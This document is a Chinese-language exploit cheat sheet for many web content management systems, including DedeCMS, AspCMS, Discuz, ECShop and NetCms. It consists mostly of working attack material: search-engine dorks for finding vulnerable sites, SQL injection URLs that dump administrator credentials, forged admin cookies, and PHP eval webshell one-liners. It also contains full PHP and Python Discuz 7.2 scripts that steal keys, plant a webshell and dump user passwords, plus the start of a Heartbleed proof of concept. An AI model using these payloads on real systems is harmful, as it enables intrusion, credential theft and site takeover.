make life get better

漏洞百出cmsexp



dedecms

找版本:/data/admin/ver.txt


?dopost=view&aid=1

/data/mysql_error_trace.inc 

/data/mysqli_error_trace.inc 

爆路径

/plus/carbuyaction.php?dopost=return&code=bank

/plus/carbuyaction.php?dopost=return&code=cod

/Include/payment/alipay.php

/Include/payment/yeepay.php

/include/dialog/select_media.php?f=form1.murl


/plugins


/plus/search.php?keyword=as&typeArr[ uNion ]=a 


/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES

[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Un

ion*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_conc

at(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23


googel关键词:


inurl:?dopost=showad

site:www.xxx.com inurl:login.php?gotopage=

?f=form1.imgsrc&imgstick=big

inurl:login.php?dopost=   good


include/dialog/select_templets.php?&activepath=%2Ftemplets%2Fplus&f=form1.templet   阉割版上传拿shell

---------------------------------------------------------------------------------------

08cms

sqling

inurl:member/index.php?ugid31=51


inurl:index.php?chid=1


inurl:index.php?caid=1


inurl:index.php?ccid=1


inurl:archive.php?aid=1


inurl:list.php?catid=1

inurl:show.php?id=


exp:


/include/paygate/alipay/pays.php?out_trade_no=22' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT concat(0x3a,mname,0x3a,password,0x3a,email,0x3a) from cms_members limit 0,1),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a) AND'


/search.php?chid=1&carsfullname=aa&searchmode=subject&orderby=aid%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&addno=0&ccid8=366


/search.php?searchmode=subject&searchword=[%]&caid=0&chid=0&ccid4=0&indays=0&orderby=createdate&searchsubmit=1


08CMS官网XSS 


http://www.08cms.com/search.phpchid=10&caid=21&searchword=%3Cscript%3Ealert(1);%3C/script%3E


-------------------------------------------------------------------------------------------------

74cms

http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23


------------------------------------------------------------------------------------------------

akcms

sql:

search.php?keywords=a%cf'+or+1=1


exp:

akcms_keyword.php?sid=11111%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x7e,0×27,password,0×27,0x7e%29%20from%20ak_admins%20limit%200,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%20%271%27=%271&keyword=11


-----------------------------------------------------------------------------------------------------------------------------------


aspcms


爆账户


http://www.webshell.cc/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4………..


爆密码


http://www.webshell.cc/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1后台登录地址:/admin/login.asp


后台拿shell


1、直接上传.asp;x


2、系统配置信息


3、模版管理新建1.asp模板,内容写马的内容.


搜索关键词:搜索关键词:intitle:Powered by AspCms2


版本不同需要更改值。


——————Cookies欺骗——————


cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9


——————webshell获取——————

所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了

AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp


admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1


————————————————————————

Powered by AspCms2.0

未验证权限,且存在注入漏洞

admin/_content/_About/AspCms_AboutEdit.asp?id=19

表名:aspcms_user

列名:loginname、password


利用EXP:

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1


2.0漏洞测试人:逍遥复仇(请注明)


——————Cookies欺骗——————

cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

逍遥复仇碰到一个站后台被管理员改了,NND。后台主页半天没有找到,最后去官方down源码查看是home.asp(版本不同如不对请试main.asp),工具为:Cookie & Inject Browser

——————webshell获取——————

所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了

admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp


----------------------------------------------------------------------------------------------------------------------------------


bbsxp


默认数据库

/database/bbsxp.mdb BBSXP论坛数据库

/bbs/database/bbsxp.mdb BBSXP论坛数据库 


BBSxp2008 8.0.4 Sql注入漏洞

漏洞文件:MoveThread.asp

MoveThread.asp行2-24

<%

if CookieUserName =empty then error("您还未<a href=""javascript:BBSXP_Modal.Open (''Login.asp'',380,170);"">登录</a>") ''保存cookie登陆即可 ThreadID=Request("ThreadID") '' Sql Injection Vulnerability

If Not IsNumeric(ThreadID) then

ThreadIDArray=Split(ThreadID,",") ''判断数组,避免13行出错

if IsArray(ThreadIDArray) then

for i=0 to Ubound(ThreadIDArray)

if Execute ("Select ThreadID from ["&TablePrefix&"Threads] where ThreadID="& ThreadIDArray(i)&"").eof then error"<li>系统不存在该帖子的资料"

next

ThreadIDSql=int(ThreadIDArray(0))

else

error("参数错误。")

end if

Else

ThreadIDSql=int(ThreadID)

End If


ForumID=Execute("Select ForumID From ["&TablePrefix&"Threads] where ThreadID="&ThreadIDSql&"")(0)

%>

<!-- #include file="Utility/ForumPermissions.asp" -->


sqlmap注入

--------------------------------------------------------------------------------------------------------

cgi

/cgi-bin/gH.cgi

/cgi-bin/Count.cgi

/cgi-bin/php

/cgi-bin/phf

/cgi-bin/guestbook

/cgi-bin/faxsurvey

/cgi-bin/perl

/cgi-bin/webgais

/cgi-bin/websendmail

/cgi-bin/htmlscript

/.svn/entries

-------------------------------------------------------------------------------------------------------

cmseasy

注入漏洞


注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0 类型:mysql blind—string 错误关键字:online.gif 表名:cmseasy_user 列明:userid,username,password 直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 关键字:Powered by CmsEasy


 


暴路径 ODAY


直接把爆路径 如:http://www.8090sec.com/index.php?case=archive


上传漏洞


Exp:


<form enctype=”multipart/form-data” method=”post” action=”http://www.8090sec.com/celive/live/doajaxfileupload.php”> <input type=”file” name=”fileToUpload”> <input type=”submit” value=”上传”> </form>


注入漏洞修复:


打开 /celive/js/include.php 文件,来到52行或此功能代码处


if (isset($_GET['departmentid'])) { $departmentid = $_GET['departmentid']; $activity_sql = “SELECT `id` FROM `”.$config['prefix'].”activity` WHERE `departmentid`=’”.$departmentid.”‘ AND `operatorid`=’”.$operatorid.”‘”; 将代码改为 if (isset($_GET['departmentid'])) { $departmentid = str_replace(“‘”,””,$_GET['departmentid']); $activity_sql = “SELECT `id` FROM `”.$config['prefix'].”activity` WHERE `departmentid`=’”.$departmentid.”‘ AND `operatorid`=’”.$operatorid.”‘”;


editor/editor/dialog/imageuser_mt_mt.php/index.php?case=user&act=log

/celive/js/include.php?cmseasylive=1111&departmentid=0 sql

-------------------------------------------------------------------------------------------------------

 Discuz

7.2


EXP:


http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23


http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23


getshell exp


<?php /*** @author: xiaoma* @blog  : www.i0day.com* @date  : 2014.7.2 23:1*/ error_reporting(0);set_time_limit(3000);$host=$argv[1];$path=$argv[2];$js=$argv[3];$timestamp = time()+10*3600;$table="cdb_";//表名 if ($argc < 2) {print_r('*********************************************************  Discuz faq.php SQL Injection Exp                    **  ---------By:Www.i0day.com-----------               **     Usage: php '.$argv[0].' url [js]                    **  -------------------------------------               **  js选项: 1.GetShell 2.取密码 3.查表前缀              **                                                      **   php '.$argv[0].' Www.i0day.com / 1                    **   php '.$argv[0].' Www.i0day.com /dz72/ 1               **                                                      **                                                      *********************************************************');exit;}if($js==1){$sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20".$table."uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23";$resp = sendpack($host,$path,$sql); if(strpos($resp,"::")==-1){echo '表前缀可能不是默认cdb_ 请先查看表前缀!';}else{preg_match("/::(.*)::/",$resp,$matches);$lenght=intval($matches[1]);if($lenght){if($lenght<=124){$sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";$resp = sendpack($host,$path,$sql);if(strpos($resp,"1\^")!=-1){preg_match("/1\^(.*)\'/U",$resp,$key1);$sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";$resp = sendpack($host,$path,$sql);preg_match("/1\^(.*)\'/U",$resp,$key2);$key=$key1[1].$key2[1];$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $key));$cmd1='<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">bbs.49you.com\');eval($_POST[i0day]);//</item></root>';$cmd2='<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">bbs.49you.com</item></root>';$html1 = send($cmd1);$res1=substr($html1,-1);$html2 = send($cmd2);$res2=substr($html1,-1);if($res1=='1'&&$res2=='1'){echo "shell地址:http://".$host.$path.'config.inc.php   pass:i0day';}}else{echo '获取失败';}}}} }elseif($js==2){$sql="action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20".$table."uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23";$resp = sendpack($host,$path,$sql);if(strpos($resp,"\^\^\^")!=-1){preg_match("/\^\^\^(.*)\^/U",$resp,$password);echo '密码:'.$password[1];}else{echo '表前缀可能不是默认cdb_ 请先查看表前缀!';}}elseif($js==3){$sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23";$resp = sendpack($host,$path,$sql);if(strpos($resp,"1\^")!=-1){preg_match("/1\^(.*)\^/U",$resp,$t); if(strpos($t[1],"cdb_")!=-1){echo "表名为:".hex2str($t[1])." 表前缀为默认cdb_ 无需修改";}else{echo "表名:".hex2str($t[1]).' 不是默认表名cdb_请自行修改代码中的$table';}}else{echo "查看表前缀失败,Sorry";}}else{echo "未选择脚本功能";}  function sendpack($host,$path,$sql,$js){$data = "GET ".$path."/faq.php?".$sql." HTTP/1.1\r\n";$data.="Host:".$host."\r\n";$data.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n";$data.="Connection: close\r\n\r\n";//$data.=$html."\r\n";$ock=fsockopen($host,80); if(!$ock){echo "No response from ".$host;die(); }fwrite($ock,$data); $resp = ''; while (!feof($ock)) { $resp.=fread($ock, 1024);} return $resp; }function send($cmd){global $host,$code,$path;$message = "POST ".$path."/api/uc.php?code=".$code."  HTTP/1.1\r\n";$message .= "Accept: */*\r\n";$message .= "Referer: ".$host."\r\n";$message .= "Accept-Language: zh-cn\r\n";$message .= "Content-Type: application/x-www-form-urlencoded\r\n";$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";$message .= "Host: ".$host."\r\n";$message .= "Content-Length: ".strlen($cmd)."\r\n";$message .= "Connection: Close\r\n\r\n";$message .= $cmd; //var_dump($message);$fp = fsockopen($host, 80);fputs($fp, $message); $resp = ''; while ($fp && !feof($fp))$resp .= fread($fp, 1024); return $resp;} function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {$ckey_length = 4; $key = md5($key ? $key : UC_KEY);$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc);$key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;$string_length = strlen($string); $result = '';$box = range(0, 255); $rndkey = array();for($i = 0; $i <= 255; $i++) {$rndkey[$i] = ord($cryptkey[$i % $key_length]);} for($j = $i = 0; $i < 256; $i++) {$j = ($j + $box[$i] + $rndkey[$i]) % 256;$tmp = $box[$i];$box[$i] = $box[$j];$box[$j] = $tmp;} for($a = $j = $i = 0; $i < $string_length; $i++) {$a = ($a + 1) % 256;$j = ($j + $box[$a]) % 256;$tmp = $box[$a];$box[$a] = $box[$j];$box[$j] = $tmp;$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));} if($operation == 'DECODE') {if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {return substr($result, 26);} else {return '';}} else {return $keyc.str_replace('=', '', base64_encode($result));} }function hex2str($hex){$str = '';$arr = str_split($hex, 2);foreach($arr as $bit){$str .= chr(hexdec($bit));}return $str;}?>


--------------------------------------------------------------------------------------------------------------------------------


wordpress


inurl:/wp-content/plugins/easy-comment-uploads/


关键字inurl:/wp-content/plugins/easy-comment-uploads/ site:il


# Tested on : Windows 7 , windows 8, linux


地址在:wp-content/uploads/2014/11/


意思就是wp-content/uploads/2014/月/你的txt名字比如


http://marvinhamlisch.us/wp-content/uploads/2014/11/txt名字


比如:http://marvinhamlisch.us/wp-content/uploads/2014/11/JeSse.txt


-------------------------------------------------------------------------------------------------

dkcms

V2.0 data/dkcm_ssdfhwejkfs.mdb


V3.1 _data/___dkcms_30_free.mdb


V4.2 _data/I^(()UU()H.mdb


默认后台:admin


编辑器:http://www.yunsec.net/admin/fckeditor


建立asp文件夹


Fck的路径:


Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp

--------------------------------------------------------------------------------------------------

DZ 7.2

#!/usr/bin/env python

# -*- coding: gbk -*-

# -*- coding: gb2312 -*-

# -*- coding: utf_8 -*- 

# author iswin 

import sys

import hashlib

import time

import math

import base64

import urllib2 

import urllib

import re


def sendRequest(url,para):

try:

data = urllib.urlencode(para)

req=urllib2.Request(url,data)

res=urllib2.urlopen(req,timeout=20).read()

except Exception, e:

print 'Exploit Failed!\n%s'%(e)

exit(0);

return res


def getTablePrefix(url):

print 'Start GetTablePrefix...'

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

res=sendRequest(url,para);

pre=re.findall("Duplicate entry '(.*?)'",res);

if len(pre)==0:

print 'Exploit Failed!'

exit(0);

table_pre=pre[0][:len(pre[0])-1].decode('hex')

table_pre=table_pre[0:table_pre.index('_')]

print 'Table_pre:%s'%(table_pre)

return table_pre


def getCurrentUser(url):

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

res=sendRequest(url,para)

pre=re.findall("Duplicate entry '(.*?)'",res)

if len(pre)==0:

print 'Exploit Failed!'

exit(0);

table_pre=pre[0][:len(pre[0])-1]

print 'Current User:%s'%(table_pre)

return table_pre


def getUcKey(url):

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

res=sendRequest(url,para);

res1=sendRequest(url,para1);

key1=re.findall("Duplicate entry '(.*?)'",res)

key2=re.findall("Duplicate entry '(.*?)'",res1)

if len(key1)==0:

print 'Get Uc_Key Failed!'

return ''

key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1]

print 'uc_key:%s'%(key)

return key


def getRootUser(url):

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

res=sendRequest(url,para);

pre=re.findall("Duplicate entry '(.*?)'",res)

if len(pre)==0:

print 'Exploit Failed!'

exit(0);

table_pre=pre[0][:len(pre[0])-1].split(' ')

print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1])


def dumpData(url,table_prefix,count):

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)}

res=sendRequest(url,para);

datas=re.findall("Duplicate entry '(.*?)'",res)

if len(datas)==0:

print 'Exploit Failed!'

exit(0)

cleandata=datas[0][:len(datas[0])-1]

info=cleandata.split(' ')

print 'user:%s pass:%s'%(info[0],info[1])


def microtime(get_as_float = False) :

    if get_as_float:

        return time.time()

    else:

        return '%.8f %d' % math.modf(time.time())

 

def get_authcode(string, key = ''):

    ckey_length = 4

    key = hashlib.md5(key).hexdigest()

    keya = hashlib.md5(key[0:16]).hexdigest()

    keyb = hashlib.md5(key[16:32]).hexdigest()

    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]

    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 

    key_length = len(cryptkey)

    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string

    string_length = len(string)

    result = ''

    box = range(0, 256)

    rndkey = dict()

    for i in range(0,256):

        rndkey[i] = ord(cryptkey[i % key_length])

    j=0

    for i in range(0,256):

        j = (j + box[i] + rndkey[i]) % 256

        tmp = box[i]

        box[i] = box[j]

        box[j] = tmp

    a=0

    j=0

    for i in range(0,string_length):

        a = (a + 1) % 256

        j = (j + box[a]) % 256

        tmp = box[a]

        box[a] = box[j]

        box[j] = tmp

        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))

    return keyc + base64.b64encode(result).replace('=', '')

 

def get_shell(url,key,host):

    headers={'Accept-Language':'zh-cn',

    'Content-Type':'application/x-www-form-urlencoded',

    'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',

    'Referer':url

    }

    tm = time.time()+10*3600

    tm="time=%d&action=updateapps" %tm

    code = urllib.quote(get_authcode(tm,key))

    url=url+"?code="+code

    data1='''<?xml version="1.0" encoding="ISO-8859-1"?>

            <root>

            <item id="UC_API">http://xxx\');eval($_POST[3]);//</item>

            </root>'''

    try:

        req=urllib2.Request(url,data=data1,headers=headers)

        ret=urllib2.urlopen(req)

    except:

        return "Exploit Falied"

    data2='''<?xml version="1.0" encoding="ISO-8859-1"?>

            <root>

            <item id="UC_API">http://aaa</item>

            </root>'''

    try:

        req=urllib2.Request(url,data=data2,headers=headers)

        ret=urllib2.urlopen(req)

    except:

        return "error"


    try:

    req=urllib2.Request(host+'/config.inc.php')

    res=urllib2.urlopen(req,timeout=20).read()

    except Exception, e:

    print 'GetWebshell Failed,%s'%(e)

      return

    print "webshell:"+host+"/config.inc.php,password:3"


if __name__ == '__main__':

print 'DZ7.x Exp Code By iswin'

if len(sys.argv)<3:

print 'DZ7.x Exp Code By iswin\nusage:python dz7.py http://www.iswin.org 10'

exit(0)

url=sys.argv[1]+'/faq.php'

count=int(sys.argv[2])

user=getCurrentUser(url)

if user.startswith('root@'):

getRootUser(url)

uc_key=getUcKey(url)

if len(uc_key)==64:

print 'Start GetWebshell...'

get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1])

tb_pre=getTablePrefix(url)

print 'Start DumpData...'

for x in xrange(0,count):

dumpData(url,tb_pre,x)


-----------------------------------------------------------------------------------------------------------------

ecshop

关键字:powered by ecshop

 

普通代码:user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*

 

变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319


直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。

 

拿shell方法很简单,找到“库项目管理”再选择“配送的方式”,在代码最下面插入php一句话木马:<?php eval($_POST[x]);?> 不行就换php木马的预代码!


接着保存,一句话路径是:http://www.xxx.org/myship.php  打开“ASP+PHP两用Shell.html”填入地址,点击一下环境变量,成功之后点击上传文件就可以拿shell了。


includes/init.php


/includes/modules/payment/alipay.php


/respond.php?code=alipay&subject=00&out_trade_no=%000'%20and%20(select%20*%20from(select%20count(*),concat(floor(rand(0)*2),(select%20concat(000x7c,user_name,000x7c,password,000x7c,ec_salt)%20from%20ecs_admin_user%20limit%201))a%20from%20information_schema.tables%20group%20by%20a)b)%20--%20by%20a


user.php


/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23


/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code


/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (sel ect * from (sel ect count(*),concat(floor(rand(0)*2),(sel ect concat(user_name,password) from ecs_admin_user limit 1))a from information_schema.tables group by a)b) — By ecshop.co/


ECshop本地包含漏洞


js/calendar.php $lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’ . EC_CHARSET); include_once(‘../languages/’ . $lang . ‘/calendar.php’);//这里包含,需要截断 测试代码 : // 需要 magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00.(注意后面有个.) 利用方法: 先注册用户 然后上传GIF89a头的GIF文件欺骗, 然后包含 代码:http://localhost/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00


ecshop爆绝对路径的bug 0day

/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

  


ecshop后台拿shell


sql语句执行


 create a(cmd text not null);


 insert into a(cmd) values('<?php eval($_POST[cmd]);?>');


select cmd from a into outfile '导出路径';


drop table if exists a;


二:

ecshop后台的数据库备份功能

------------------------------------------------------------------------------------------------------

netcms

漏洞网站程序:NetCms网站管理系统

漏洞在文件网站注册地址:/user/login.aspx

1.首先,我们在百度或者谷歌搜索关键字: “NetCms网站管理系统”


intitle:NetCms网站管理系统


2.然后随便找个网站。然后进去, /user/login.aspx ,点注册。

user/Register.aspx


q7170610


Userfiles/477187224365/8fc83811c47c6de6x.aspx

3.注册完成后登录帐号,登录成功以后在发表文章页面

点击“选择图片”

  


我们在这里,记下这个目录名, /Userfiles/486202957767 , 这是你的附件保存的目录名。

然后在站内信息那块, 给自己发送个站内信,附件里直接传马。


  


然后点击发送短信

  


然后返回管理,找到发送箱,查看我们发送的木马名字

  


木马文章名为: a40a3393c76655f41.asp

PS:可直接右键保存木马文件即可查看到木马文件名

  

然后,我们的马儿完整的路径就是/Userfiles/486202957767/a40a3393c76655f41.asp 就这样简单的获得了网站的webshell

-------------------------------------------------------------------------------------

openssl

#!/usr/bin/python


# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

# The author disclaims copyright to this source code.


import sys

import struct

import socket

import time

import select

import re

from optparse import OptionParser


options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')

options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')


def h2bin(x):

    return x.replace(' ', '').replace('\n', '').decode('hex')


hello = h2bin('''

16 03 02 00  dc 01 00 00 d8 03 02 53

43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf

bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00

00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88

00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c

c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09

c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44

c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c

c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11

00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04

03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19

00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08

00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13

00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00

00 0f 00 01 01                                  

''')


hb = h2bin(''' 

18 03 02 00 03

01 40 00

''')


def hexdump(s):

    for b in xrange(0, len(s), 16):

        lin = [c for c in s[b : b + 16]]

        hxdat = ' '.join('%02X' % ord(c) for c in lin)

        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

        print '  %04x: %-48s %s' % (b, hxdat, pdat)

    print


def recvall(s, length, timeout=5):

    endtime = time.time() + timeout

    rdata = ''

    remain = length

    while remain > 0:

        rtime = endtime - time.time() 

        if rtime < 0:

            return None

        r, w, e = select.select([s], [], [], 5)

        if s in r:

            data = s.recv(remain)

            # EOF?

            if not data:

                return None

            rdata += data

            remain -= len(data)

    return rdata

        


